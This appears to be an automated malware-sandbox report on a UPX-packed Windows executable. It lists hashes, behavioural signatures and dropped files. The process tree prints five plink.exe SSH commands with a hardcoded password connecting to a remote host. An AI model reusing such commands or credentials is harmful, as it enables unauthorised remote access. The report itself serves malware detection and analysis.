bc35b97a1c2c301c918b83f84ce8dd3152f2416c94d82952f45c6c195c614091

Analysis

max time kernel
169s
max time network
179s
platform
windows10-2004_x64
resource
win10v2004-20231023-en
resource tags

arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
submitted
31-10-2023 14:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe
Size

3.5MB
MD5

e617eb1b935a9a55e2908dc140514962
SHA1

59dfe58676e727ca940de7feb603d7ed8be66974
SHA256

962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e
SHA512

2c00dbfb456a56a47d3022246fcb737fa5c0ac66a6a204c937265b2fcaa0b396c934f1978aad82d405bed0aa3668b3ced683fa030f86a469b3ff9364f14c1898
SSDEEP

98304:ETg+hZxFF8NE6qL9ZxqpbsM+bAV/A7p81:+g+hbfqCJqpn/AN81

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 5 IoCs

pid	Process
408	plink.exe
1164	plink.exe
3684	plink.exe
4480	plink.exe
3768	plink.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3368-0-0x0000000000800000-0x0000000001762000-memory.dmp	upx
behavioral2/memory/3368-1-0x0000000000800000-0x0000000001762000-memory.dmp	upx
behavioral2/memory/3368-2-0x0000000000800000-0x0000000001762000-memory.dmp	upx
behavioral2/memory/3368-11-0x0000000000800000-0x0000000001762000-memory.dmp	upx
behavioral2/memory/3368-15-0x0000000000800000-0x0000000001762000-memory.dmp	upx
behavioral2/memory/3368-19-0x0000000000800000-0x0000000001762000-memory.dmp	upx
behavioral2/memory/3368-20-0x0000000000800000-0x0000000001762000-memory.dmp	upx
behavioral2/memory/3368-21-0x0000000000800000-0x0000000001762000-memory.dmp	upx
behavioral2/memory/3368-25-0x0000000000800000-0x0000000001762000-memory.dmp	upx
behavioral2/memory/3368-26-0x0000000000800000-0x0000000001762000-memory.dmp	upx
behavioral2/memory/3368-30-0x0000000000800000-0x0000000001762000-memory.dmp	upx
behavioral2/memory/3368-31-0x0000000000800000-0x0000000001762000-memory.dmp	upx
behavioral2/memory/3368-35-0x0000000000800000-0x0000000001762000-memory.dmp	upx
behavioral2/memory/3368-36-0x0000000000800000-0x0000000001762000-memory.dmp	upx

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe
3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 3368 wrote to memory of 408	3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe	92
PID 3368 wrote to memory of 408	3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe	92
PID 3368 wrote to memory of 408	3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe	92
PID 3368 wrote to memory of 1164	3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe	102
PID 3368 wrote to memory of 1164	3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe	102
PID 3368 wrote to memory of 1164	3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe	102
PID 3368 wrote to memory of 3684	3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe	108
PID 3368 wrote to memory of 3684	3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe	108
PID 3368 wrote to memory of 3684	3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe	108
PID 3368 wrote to memory of 4480	3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe	112
PID 3368 wrote to memory of 4480	3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe	112
PID 3368 wrote to memory of 4480	3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe	112
PID 3368 wrote to memory of 3768	3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe	114
PID 3368 wrote to memory of 3768	3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe	114
PID 3368 wrote to memory of 3768	3368	962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe	114

C:\Users\Admin\AppData\Local\Temp\962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe
"C:\Users\Admin\AppData\Local\Temp\962e21c398c84c6b3ce7e825b50fcb9e12269e19176db0dec214cdec84251b8e.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3368
- C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe
  "C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe" -v -t -pw "Xooviet0" [email protected] while :; do echo Test9E98BC31224576B919C523809D7AA0FC; sleep 53; done;
  2⤵
  - Executes dropped EXE
  PID:408
- C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe
  "C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe" -v -t -pw "Xooviet0" [email protected] while :; do echo Test742EA85E3220ACA1872C1D726FE75EA2; sleep 53; done;
  2⤵
  - Executes dropped EXE
  PID:1164
- C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe
  "C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe" -v -t -pw "Xooviet0" [email protected] while :; do echo TestA97AABA71EB789DE351105F2376EBA47; sleep 53; done;
  2⤵
  - Executes dropped EXE
  PID:3684
- C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe
  "C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe" -v -t -pw "Xooviet0" [email protected] while :; do echo Test5CB7E4C2AA5264CF66D72387C96959CF; sleep 53; done;
  2⤵
  - Executes dropped EXE
  PID:4480
- C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe
  "C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe" -v -t -pw "Xooviet0" [email protected] while :; do echo TestF40990671FFA1A14E6619501F14A1399; sleep 53; done;
  2⤵
  - Executes dropped EXE
  PID:3768

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\PUTTY.RND

Filesize
600B

MD5
f99444e491e9ac536f39618a4a982965

SHA1
dc4609827cb3a376c496e3b443e20a56cdc44397

SHA256
558a27d5499d0a7ad2e371d9ea59f59ce3784ebc82ff2f55d4b5940744c76c8e

SHA512
decf88dbca649465ea2f6110ce0a6810da7cf675643058beac19e8d5e8cce6a2c8769ba9bfaaf195a65451d5df4443574eb77d4f3152f7e91a5ad7cf71ee3da9

Download Submit
C:\Users\Admin\AppData\Local\PUTTY.RND

Filesize
600B

MD5
cdceb35fff6459f6d7da2f40fa1b711c

SHA1
ac7d2879924dfd1f311fda338611716e98d311be

SHA256
d84d8c8003442a6365ce544812e1182054e65fcbca80ea61767eca6eadc36d76

SHA512
015a2b3a8560086f568237c523a8afd10662b62e3e7c837152197ce9a5c7f34619c6a5f288c386b6c88a6f90a3394e85997d6e2b85b88934c49b8938ec26bf5a

Download Submit
C:\Users\Admin\AppData\Local\PUTTY.RND

Filesize
600B

MD5
0359ef48cb21b1cf4fea994054b7e516

SHA1
c03032d657c1731025834919f31fa41e8c52f6b2

SHA256
06b28af6ed7c40bd73784b82be5d455f63c39b00011ac7839e6a83814a67c241

SHA512
cb59d676b8eb2b85436123a105557b33ca9cd0744144b2a00e5660223d9e73e04ed9e7d9ece1e58d56d76d9e188d95d446492f0ce5a4af807ea8a550a899f320

Download Submit
C:\Users\Admin\AppData\Local\PUTTY.RND

Filesize
600B

MD5
e7164b69bdf0a4191de55ec65a209a44

SHA1
6a621cd055a9ee3efed4624e702159aa496b72ed

SHA256
6cffa41b826827f59187d4297b5dcbe3ab98c0a11073cbf04c05b6dd4a5e5e35

SHA512
6e3d9cb1ba48893cd37a205e3f3919cddfcfce1b815df552be5ce0b3f8a15706cfe8397fb2a24a9b2a5a2399a9d641da3b77202c54389f70e5cf5e285e80c39f

Download Submit
C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe

Filesize
533KB

MD5
528248ae133191c591ec6d12732f2cfd

SHA1
7806ad24f669cd8bb9ebe16f87e90173047f8ee4

SHA256
5a21a83dfb5822301896a696f3a1a3e8207bf541e11cd1f2bbb7bc666251d8c7

SHA512
157ef9972baa3b088addba8b67610b597ea4974e4e4abb9dbdb60c031c543183b3e16384a61ac1b4982bb11fe6cf13718afe111222848dcc26c4886299b2317d

Download Submit
C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe

Filesize
533KB

MD5
528248ae133191c591ec6d12732f2cfd

SHA1
7806ad24f669cd8bb9ebe16f87e90173047f8ee4

SHA256
5a21a83dfb5822301896a696f3a1a3e8207bf541e11cd1f2bbb7bc666251d8c7

SHA512
157ef9972baa3b088addba8b67610b597ea4974e4e4abb9dbdb60c031c543183b3e16384a61ac1b4982bb11fe6cf13718afe111222848dcc26c4886299b2317d

Download Submit
C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe

Filesize
533KB

MD5
528248ae133191c591ec6d12732f2cfd

SHA1
7806ad24f669cd8bb9ebe16f87e90173047f8ee4

SHA256
5a21a83dfb5822301896a696f3a1a3e8207bf541e11cd1f2bbb7bc666251d8c7

SHA512
157ef9972baa3b088addba8b67610b597ea4974e4e4abb9dbdb60c031c543183b3e16384a61ac1b4982bb11fe6cf13718afe111222848dcc26c4886299b2317d

Download Submit
C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe

Filesize
533KB

MD5
528248ae133191c591ec6d12732f2cfd

SHA1
7806ad24f669cd8bb9ebe16f87e90173047f8ee4

SHA256
5a21a83dfb5822301896a696f3a1a3e8207bf541e11cd1f2bbb7bc666251d8c7

SHA512
157ef9972baa3b088addba8b67610b597ea4974e4e4abb9dbdb60c031c543183b3e16384a61ac1b4982bb11fe6cf13718afe111222848dcc26c4886299b2317d

Download Submit
C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe

Filesize
533KB

MD5
528248ae133191c591ec6d12732f2cfd

SHA1
7806ad24f669cd8bb9ebe16f87e90173047f8ee4

SHA256
5a21a83dfb5822301896a696f3a1a3e8207bf541e11cd1f2bbb7bc666251d8c7

SHA512
157ef9972baa3b088addba8b67610b597ea4974e4e4abb9dbdb60c031c543183b3e16384a61ac1b4982bb11fe6cf13718afe111222848dcc26c4886299b2317d

Download Submit
C:\Users\Admin\AppData\Local\Temp\MartemGWS\plink.exe

Filesize
533KB

MD5
528248ae133191c591ec6d12732f2cfd

SHA1
7806ad24f669cd8bb9ebe16f87e90173047f8ee4

SHA256
5a21a83dfb5822301896a696f3a1a3e8207bf541e11cd1f2bbb7bc666251d8c7

SHA512
157ef9972baa3b088addba8b67610b597ea4974e4e4abb9dbdb60c031c543183b3e16384a61ac1b4982bb11fe6cf13718afe111222848dcc26c4886299b2317d

Download Submit
memory/3368-11-0x0000000000800000-0x0000000001762000-memory.dmp

Filesize
15.4MB

Download
memory/3368-26-0x0000000000800000-0x0000000001762000-memory.dmp

Filesize
15.4MB

Download
memory/3368-20-0x0000000000800000-0x0000000001762000-memory.dmp

Filesize
15.4MB

Download
memory/3368-21-0x0000000000800000-0x0000000001762000-memory.dmp

Filesize
15.4MB

Download
memory/3368-15-0x0000000000800000-0x0000000001762000-memory.dmp

Filesize
15.4MB

Download
memory/3368-13-0x0000000001DD0000-0x0000000001DD1000-memory.dmp

Filesize
4KB

Download
memory/3368-25-0x0000000000800000-0x0000000001762000-memory.dmp

Filesize
15.4MB

Download
memory/3368-19-0x0000000000800000-0x0000000001762000-memory.dmp

Filesize
15.4MB

Download
memory/3368-0-0x0000000000800000-0x0000000001762000-memory.dmp

Filesize
15.4MB

Download
memory/3368-3-0x0000000001DD0000-0x0000000001DD1000-memory.dmp

Filesize
4KB

Download
memory/3368-30-0x0000000000800000-0x0000000001762000-memory.dmp

Filesize
15.4MB

Download
memory/3368-31-0x0000000000800000-0x0000000001762000-memory.dmp

Filesize
15.4MB

Download
memory/3368-2-0x0000000000800000-0x0000000001762000-memory.dmp

Filesize
15.4MB

Download
memory/3368-1-0x0000000000800000-0x0000000001762000-memory.dmp

Filesize
15.4MB

Download
memory/3368-35-0x0000000000800000-0x0000000001762000-memory.dmp

Filesize
15.4MB

Download
memory/3368-36-0x0000000000800000-0x0000000001762000-memory.dmp

Filesize
15.4MB

Download